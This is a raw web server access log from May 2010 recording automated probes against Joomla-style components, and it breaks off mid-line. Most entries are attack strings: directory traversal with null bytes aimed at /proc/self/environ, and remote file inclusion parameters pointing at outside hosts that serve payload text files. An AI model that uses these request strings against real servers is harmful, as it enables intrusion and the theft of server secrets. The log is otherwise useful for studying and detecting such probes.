74.55.65.134 - - [30/May/2010:09:47:21 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:09:47:22 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [30/May/2010:09:47:59 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:47:59 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:47:59 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:48:16 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:48:17 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:48:17 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
208.115.111.248 - - [30/May/2010:09:48:54 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
74.55.65.134 - - [30/May/2010:09:49:23 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:09:49:28 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [30/May/2010:09:49:34 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
189.108.172.26 - - [30/May/2010:09:49:40 -0500] "GET /logs//config.inc.php?mosConfig_absolute_path=http://www.cpa.gov.bd/fako/nex? HTTP/1.1" 404 304 "-""libwww-perl/5.808"
189.108.172.26 - - [30/May/2010:09:49:41 -0500] "GET /logs//config.inc.php?mosConfig_absolute_path=http://no.no-ip.com/images/ocer/fako.txt?????? HTTP/1.1" 404 304 "-""libwww-perl/5.808"
189.108.172.26 - - [30/May/2010:09:49:42 -0500] "GET //config.inc.php?mosConfig_absolute_path=http://www.cpa.gov.bd/fako/nex? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
189.108.172.26 - - [30/May/2010:09:49:43 -0500] "GET //config.inc.php?mosConfig_absolute_path=http://no.no-ip.com/images/ocer/fako.txt?????? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
194.100.228.237 - - [30/May/2010:09:49:56 -0500] "GET /logs//include/db.php?rootdp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.803"
194.100.228.237 - - [30/May/2010:09:49:56 -0500] "GET //include/db.php?rootdp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
207.46.13.100 - - [30/May/2010:09:49:57 -0500] "GET /logs/access_log.1261699200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
194.100.228.237 - - [30/May/2010:09:50:00 -0500] "GET /logs//include/db.php?rootdp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.803"
194.100.228.237 - - [30/May/2010:09:50:00 -0500] "GET //include/db.php?rootdp=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.59.6.16 - - [30/May/2010:09:50:13 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.aek.mk/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:09:50:13 -0500] "GET /logs/access_log.1272585600/index.php?option=com_ninjarsssyndicator&controller=http://www.aek.mk/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:09:50:13 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.aek.mk/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.174.120.30 - - [30/May/2010:09:50:19 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=http://www.aek.mk/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
93.174.120.30 - - [30/May/2010:09:50:19 -0500] "GET /logs/access_log.1272585600/index.php?option=com_ninjarsssyndicator&controller=http://www.aek.mk/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.120.30 - - [30/May/2010:09:50:19 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=http://www.aek.mk/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:52:20 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:52:21 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.55.65.134 - - [30/May/2010:09:52:22 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:52:23 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:52:23 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:52:23 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
75.136.121.230 - - [30/May/2010:09:52:23 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.65.134 - - [30/May/2010:09:52:23 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:52:24 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:52:27 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:52:30 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:53:02 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:53:02 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:53:02 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
64.131.77.225 - - [30/May/2010:09:53:11 -0500] "GET /logs//index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
64.131.77.225 - - [30/May/2010:09:53:11 -0500] "GET //index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
219.117.209.213 - - [30/May/2010:09:53:12 -0500] "GET /logs//index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
219.117.209.213 - - [30/May/2010:09:53:13 -0500] "GET //index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
75.136.121.230 - - [30/May/2010:09:53:27 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:53:29 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:53:29 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.228.226.12 - - [30/May/2010:09:54:16 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:54:16 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:54:17 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
121.190.102.21 - - [30/May/2010:09:54:17 -0500] "GET //hbcinfo/links//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:09:54:17 -0500] "GET /logs/access_log.1263081600//hbcinfo/links//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:09:54:17 -0500] "GET /logs//hbcinfo/links//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:18 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:21 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:21 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:21 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:22 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:25 -0500] "GET /logs/access_log.1273363200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:38 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:38 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:54:38 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.190.102.21 - - [30/May/2010:09:54:43 -0500] "GET /logs/access_log.1270857600//hbcinfo/links//txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.pyungsan.or.kr/bbs/id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
74.55.65.134 - - [30/May/2010:09:55:17 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:55:17 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:55:17 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:09:55:29 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:55:29 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:55:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
75.136.121.230 - - [30/May/2010:09:55:36 -0500] "GET /logs/access_log.1273363200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:55:36 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
75.136.121.230 - - [30/May/2010:09:55:38 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
74.55.65.134 - - [30/May/2010:09:56:02 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:56:02 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:56:02 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
203.72.226.120 - - [30/May/2010:09:56:09 -0500] "GET /logs//index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
203.72.226.120 - - [30/May/2010:09:56:10 -0500] "GET //index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.55.65.134 - - [30/May/2010:09:56:40 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:56:40 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:56:40 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.228.226.12 - - [30/May/2010:09:56:41 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:56:42 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:56:42 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:58:06 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:58:42 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:58:42 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:09:58:42 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.55.65.134 - - [30/May/2010:09:59:28 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:59:29 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:59:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:59:29 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:59:29 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:09:59:29 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:10:01:22 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [30/May/2010:10:01:26 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
91.121.104.108 - - [30/May/2010:10:02:36 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:02:36 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:02:37 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:02:37 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
67.228.226.12 - - [30/May/2010:10:02:59 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:10:02:59 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:10:03:00 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.226.12 - - [30/May/2010:10:04:49 -0500] "GET /logs/access_log.1273017600//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.121.104.108 - - [30/May/2010:10:07:25 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:07:25 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:07:49 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:07:49 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:11:42 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:11:42 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:11:42 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:11:42 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:12:24 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:12:24 -0500] "GET //*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 286 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:12:30 -0500] "GET /logs//*?option=com_shoutbox&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 291 "-""libwww-perl/5.803"
91.121.104.108 - - [30/May/2010:10:12:31 -0500] "GET /